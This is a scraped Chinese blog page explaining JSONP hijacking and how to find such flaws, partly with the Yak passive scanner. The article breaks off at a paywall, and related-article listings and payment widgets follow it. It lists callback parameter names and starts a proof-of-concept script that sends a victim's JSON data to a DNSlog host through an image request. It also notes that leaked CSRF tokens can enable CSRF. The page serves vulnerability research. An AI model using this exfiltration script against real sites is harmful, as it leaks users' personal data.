基于Yak的被动扫描jsonp识别

原创 已于 2023-11-08 11:55:29 修改 · 437 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #安全 #自动化

于 2023-11-08 11:55:20 首次发布
本文探讨了JSONP跨域技术的利用和潜在的劫持漏洞,介绍了如何通过开发者工具挖掘JSONP漏洞,以及使用Yak工具进行被动扫描以检测和发现这些漏洞的过程。

作者:@shangzeng师傅

什么是JSONP劫持漏洞

同源策略(同协议、同域名、同端口)导致的不同域名的网站无法传输数据,但是在某些时刻我们有需要进行跨域传输数据。

这时候jsonp身为跨域的方法中的一个就孕育而生了,由于html标签中的<script> 、<img>、<iframe> 这三个标签是允许进行资源的跨域获取的,jsonp就是利用了这三个标签中的其中一个 <script> 利用js代码动态生成script标签然后利用标签中的src属性来进行资源的跨域调用。

在数据传输未设置有效的校验的情况下,就有可能导致JSONP劫持漏洞,造成信息泄漏。

在配置存在问题的情况下,jsonp使用回调函数来在第三方网站调出我们的敏感信息,从而达到获取敏感信息的目的,常见的利用场景如下:

  • 获取个人信息,蓝队反制,蜜罐溯源等等
  • 用于跨域传输数据,通过jsonp发起请求,得到泄露的csrf_token然后,利用这个token 实现CSRF 攻击

JSONP 漏洞挖掘原理

常规方式

  • 使用火狐/谷歌浏览器打开开发者模式,选择Network,勾选Preserve log选项,防止干扰

在左下搜栏目寻找或者在可能存在jsonp的地方添加检索相应的关键字,访问目标相关网站即可:

 jsonp  
jsoncb  
jsonpcb  
cb  
json  
jsonpcall  
jsoncall  
jQuery  
callback  
back

在JSONP挖掘中,并不是只有callback才会出现JSONP漏洞,我们可以自己构造调用,毕竟<script>标签不支持同源策略,只要没有referer等限制,就有可能存在漏洞,其中POC如下:(这里使用DNSlog来获取回调的信息):

<script type="text/javascript">function jsonp_1610359498402_9620(json){  
alert(JSON.stringify(json))  
new Image().src="http://xxxx6.ceye.io/" + JSON.stringify(j
最低0.47元/天 解锁文章
YakProject
关注
Yaklang XSS 检测启发式算法(被动扫描插件)
顶峰
02-17 577
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
记一次“安全扫描工具联动”自动化扫描漏洞流程
黑战士的博客
05-17 1810
Acunetix Web Vulnerability Scanner(AWVS)是用于测试和管理Web应用程序安全性的平台,能够自动扫描互联网或者本地局域网中是否存在漏洞,并报告漏洞。可以扫描任何通过Web浏览器访问和遵循HTTP/HTTPS规则的Web站点。适用于任何中小型和大型企业的内联网、外延网和面向客户、雇员、厂商和其它人员的Web网站。AWVS可以通过检查SQL注入攻击漏洞、XSS跨站脚本攻击漏洞等漏洞来审核Web应用程序的安全性。
网络安全扫描工具联动实战!自动化漏洞扫描全流程详解,渗透测试必看基础教程
最新发布
白帽阿叁的博客
08-12 1041
摘要:本文介绍了5款常用的Web安全扫描工具(AWVS、Appscan、Yakit、Burp Suite、Xray)及其联动使用方法。这些工具可自动检测SQL注入、XSS等常见漏洞,支持Web应用和移动端安全测试,并提供可视化报告。通过工具联动配置(如设置代理监听端口),可实现对目标网站的自动化扫描,显著提升渗透测试效率。文章详细说明了各工具的功能特点、安装方法及下载途径,适合网络安全从业者快速构建自动化测试环境。 (字数:149)
Yakit工具篇:端口探测和指纹扫描的配置和使用
黄乔国PHP
10-18 2786
端口扫描和指纹识别是渗透测试和网络安全领域中常用的基础技术之一,用于评估目标系统的安全性和发现可能存在的漏洞和攻击面。也是Yakit基础工具的模块之一。
(源码)基于 Yak 语言的 Web 安全集成化工具平台.zip
06-22
# 基于 Yak 语言的 Web 安全集成化工具平台 ## 项目简介 本项目是一个基于 Yak 语言的 Web 安全集成化工具平台,由 Yak 语言和 Yakit 客户端构成。Yak 是专为 Web 安全研发设计的垂直领域语言,具备强大安全能力且...
yak成像.rar_ISAR 数据_ISAR成像_isar数据_sign38y_yak
07-14
"yak成像.rar_ISAR 数据_ISAR成像_isar数据_sign38y_yak"这个标题暗示了这是一个关于ISAR成像技术的实例,其中包含了针对Yak飞机的仿真数据。 ISAR的基本原理是,雷达发射出的脉冲在与目标交互后反射回来,由于目标...
yak-hunt:无论您身在何处,基于网络的 Yik-Yak 客户端都可以猎杀牦牛
07-10
牦牛狩猎 无论您身在何处,都可以猎杀牦牛。 去拿他们。 特征 此应用程序旨在添加以下功能: 查看、发布和评论位于世界任何地方的任何 Yik Yak... Yak Hunt 与官方的 Yik Yak 应用程序没有任何关系。 请不要起诉我:)
Yak:基于CakePHP的高效Ktai插件
结合描述中提到的内容,Yak 的核心优势体现在三大技术模块:基于 HTML_Emoji 的象形图渲染引擎、采用 woothee-php 实现的 UA 判断机制,以及专注于 CakePHP 框架深度集成的设计哲学。 在象形图渲染方面,Yak 使用了...
记一次“网络安全扫描工具联动”自动化扫描漏洞流程,网络渗透必看基础教程!
A1353192296的博客
10-25 1533
经过测试,流量都经过了五个安全扫描工具,对目标网站进行全方位的扫描,经过测试效果还不错,感兴趣的师傅可以试试看。虽然说现在网上有各式各样的安全漏洞扫描工具可以利用,但是这些工具都是人写的,多多少少都会有些漏洞和不足,不能太依赖这些测试工具,打铁还需自身硬!!!给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
新一代SQL注入检测技术,小白也能轻松挖到漏洞!
xiaoheizi的博客
07-10 441
会持续更新yakit插件和各种漏洞漏洞探针和利用工具,哪怕你是什么都不懂的小白用了插件点点鼠标就能挖到漏洞。
Yak 命令行扫描指南
YakProject的博客
04-09 1213
出于各种原因,很多师傅提出想要使用 yak 命令行对目标系统发起扫描,在 Yaklang v1.3.1-sp3 的版本中,我们对yak 引擎中的许多功能添加了命令行支持,比如 scan(插件扫描)/yso(yak Ysoserial Util) ,本次就大家比较关心的命令行扫描功能进行介绍,一起来看看如何使用 yak 命令行进行扫描。可以使用关键字指定要扫描的插件,例如使用 "shiro" 关键字进行扫描,可以看到下面加载了五个插件,这次我们的目标输入使用。
偶遇YAK插件,超级牛拼尽全力终于拿下
YakProject的博客
12-30 1486
经常有朋友在学习使用Yakit的时候发出这样的疑问:“Yakit插件的原理是啥?“××插件能在Yakit里找到类似功能的插件吗?好说,那今天牛牛就带大家详细了解一下主动扫描被动扫描,在字面上就已经有所区分。主动指的是需要对目标地址进行特定的访问,比如在指纹识别的过程中,很多cms需要进行特定路径的访问或者ico hash的计算才能得出具体的指纹。被动指的根据经过的request/response流量就可以完成对应的功能。
安全研发启蒙课: 子域名收集联动Yak漏扫插件
YakProject的博客
11-02 306
本篇文章通过对子域名扫描与端口扫描插件联动实现自动化对某域名目标的漏洞扫描yakit的库函数不仅可以方便的调用插件,实现各种联动,还可以自动生成UI,表格的数据还可以一键导出,真的很方便,师傅们用起来!
SyntaxFlow Java实战(一):值的搜索与筛选
YakProject的博客
03-07 900
其实现的原理是通过SSA的OpMake(关于Make的信息可以查看官方理论知识文档)作为容器,使用一个容器存储注解相关的信息,然后通过一个索引到索引到存储方法的容器上面上面。值得注意的是,官方内置的检测弱哈希算法的规则比上面写的更为复杂,主要涉及到了数据流分析。变量的搜索很简单,但是在实战中几乎没有用(因为左值都是人为命名的,每个人命名的名字各种各样,因此写出来的规则没有普适性)。链式调用的方法会将前面的调用者作为第一参数(这也是为什么链式调用的数据流能够连同的原因,关于这部分的内容后面也会进行介绍)。
【漏洞利用】JSONP跨域请求漏洞 挖掘、利用详解
weixin_44023442的博客
03-13 3658
参考文章 轻松搞定JSONP跨域请求 jsonp跨域原理,使用以及同源策略 跨域漏洞丨JSONP和CORS跨域资源共享 Tag: Ref: [[019.同源策略]] 本片文章仅供学习使用,切勿触犯法律! 未写完,待补充 概述 总结 一、漏洞介绍 JSONP介绍 JSONP 是 JSON with padding(填充式 JSON 或参数式 JSON)的简写。 JSONP是一种利用HTML中<script></script>元素标签,远程调用json文件来实现数据传递的技术,
JSON劫持漏洞(详细讲解利用JSON从而进行数据劫持的漏洞攻防策略)
热门推荐
一只苟延残喘的卑微蝼蚁
05-24 2万+
英文原文:JSON Hijacking英汉对照:JSON Hijacking 翻译对照原文解析:JSON劫持漏洞分析和攻防演练声明(阅读前必读!!!):转载自这篇文章本人是一个英语渣,英语四级都没过。翻译此文存粹用于英语学习,而且大部分还是用翻译软件翻译的。请谨慎阅读此译文,注意不要被译文雷到。另外这是一篇2009年的老文章了,里面有部分知识可能已经过时了,不过文章中关于JSON劫持的知识大部分还...
Ajax跨域:Jsonp原理解析
weixin_34218579的博客
03-09 861
关于 JSONP JSONP 全称是 JSON with Padding ,是基于 JSON 格式的为解决跨域请求资源而产生的解决方案。他实现的基本原理是利用了 HTML 里 &lt;script&gt;&lt;/script&gt; 元素标签,远程调用 JSON 文件来实现数据传递。如要在 a.com 域下获取存在 b.com 的 JSON 数据( getUsers.JSON ): ...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值